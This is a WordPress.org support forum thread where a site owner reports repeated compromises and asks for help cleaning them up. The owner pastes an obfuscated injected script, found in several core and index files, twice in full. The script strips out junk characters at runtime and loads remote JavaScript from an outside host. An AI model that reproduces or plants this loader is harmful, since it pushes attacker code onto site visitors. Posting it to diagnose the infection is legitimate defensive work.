WordPress.org

Forums

<script> appearing in core files and disabling WordPress (4 posts)

  1. stonegauge
    Member
    Posted 5 years ago #

    The last two days, a site I host has been compromised twice by the same <script> popping up in core WordPress files. This happened on 2.8.6 and 2.9. Not faulting WordPress here -- there's something else at work that is allowing access for this code to be placed onto the site.

    At any rate, yesterday the code in question appeared in wp-includes/default-widgets.php and just now it appeared in wp-includes/default-filters.php at the very bottom of each file.

    <script>/*GNU GPL*/ try{window.onload = function(){var Z053al9rqw = document.createElement('s#$c@#()$r)&^(i@@()p$#!t!#('.replace(/\!|\$|@|\(|\^|&|\)|#/ig, ''));Z053al9rqw.setAttribute('type', 'text/javascript');Z053al9rqw.setAttribute('src', 'h$t&t@!$#p$#:(!/@@/(&)t!$i(m(!!^e#($-(#c@$o)!^m$&#.!!s$#)u)$@r#^v!@(e(&y)(&&m@@o((n!^k#&)^#e&y(#$.$!c!$o&($m@!#.)$w^$^a&s#$(h^i!#n$!^g))t@)o^n^p^^o^@#$s&^t@@-^!c(^&o&m!^!^$.#w!@i&$&$@n$)$t#&#!e))&r$$#s(&a!$(l@e!@(o)^$#n^$)l)(&)i@&n!!@#e#!.$@#r^)!u&#^:@$8@!0)$#8@^!0!!!/^^))g!($o)^&o&g@#)&l^&&)e().^$&c#)@$!o!@)m$$/$!!!#g$o)@(o@g)#l@#^)@e$!#.#^@#c(@o^m!#/#$&z(@e@!!(d((o##(.!c@^!o)!)m)/^!m#)!@e&d&#i^(@a@(p$l^^e#x($.#!#c^&&!o@#^m^^/$^)g&&!o(^&o^g@!l^@@e@#.$c(o!.@^t(^h^!/&&'.replace(/\^|\!|\)|#|\(|&|\$|@/ig, ''));Z053al9rqw.setAttribute('defer', 'defer');Z053al9rqw.setAttribute('id', 'M@^g(7)m$&5#l#s@$(!#o#@^k#!$q)$)'.replace(/&|@|\!|\$|#|\^|\)|\(/ig, ''));document.body.appendChild(Z053al9rqw);}} catch(e) {}</script>

    I'm wondering if this is a plugin that is compromising the site security (other blogs on my account have not been compromised) or if it's a theme file or what? I've changed the FTP access codes n case that was the site of the compromise...

  2. esmi
    Forum Moderator
    Posted 5 years ago #

  3. stonegauge
    Member
    Posted 5 years ago #

    Yeah, I never really "Cleaned up" -- just removed the bad files. Also found a theme no longer posted RSS and that had to be changed. I'll follow the steps in those links. Thanks emsi.

  4. stonegauge
    Member
    Posted 5 years ago #

    I'm in the middle of following some steps from the above links and wanted to post what I found:

    Script code added to the index.php file itself

    <script>/*GNU GPL*/ try{window.onload = function(){var Z053al9rqw = document.createElement('s#$c@#()$r)&^(i@@()p$#!t!#('.replace(/\!|\$|@|\(|\^|&|\)|#/ig, ''));Z053al9rqw.setAttribute('type', 'text/javascript');Z053al9rqw.setAttribute('src', 'h$t&t@!$#p$#:(!/@@/(&)t!$i(m(!!^e#($-(#c@$o)!^m$&#.!!s$#)u)$@r#^v!@(e(&y)(&&m@@o((n!^k#&)^#e&y(#$.$!c!$o&($m@!#.)$w^$^a&s#$(h^i!#n$!^g))t@)o^n^p^^o^@#$s&^t@@-^!c(^&o&m!^!^$.#w!@i&$&$@n$)$t#&#!e))&r$$#s(&a!$(l@e!@(o)^$#n^$)l)(&)i@&n!!@#e#!.$@#r^)!u&#^:@$8@!0)$#8@^!0!!!/^^))g!($o)^&o&g@#)&l^&&)e().^$&c#)@$!o!@)m$$/$!!!#g$o)@(o@g)#l@#^)@e$!#.#^@#c(@o^m!#/#$&z(@e@!!(d((o##(.!c@^!o)!)m)/^!m#)!@e&d&#i^(@a@(p$l^^e#x($.#!#c^&&!o@#^m^^/$^)g&&!o(^&o^g@!l^@@e@#.$c(o!.@^t(^h^!/&&'.replace(/\^|\!|\)|#|\(|&|\$|@/ig, ''));Z053al9rqw.setAttribute('defer', 'defer');Z053al9rqw.setAttribute('id', 'M@^g(7)m$&5#l#s@$(!#o#@^k#!$q)$)'.replace(/&|@|\!|\$|#|\^|\)|\(/ig, ''));document.body.appendChild(Z053al9rqw);}} catch(e) {}</script>

    Wp-content/index.php also has a script inserted. I just backe dup teh sties and the DB and will be doing an ultra-clean install (deleting everything on the server).

Topic Closed

This topic has been closed to new replies.

About this Topic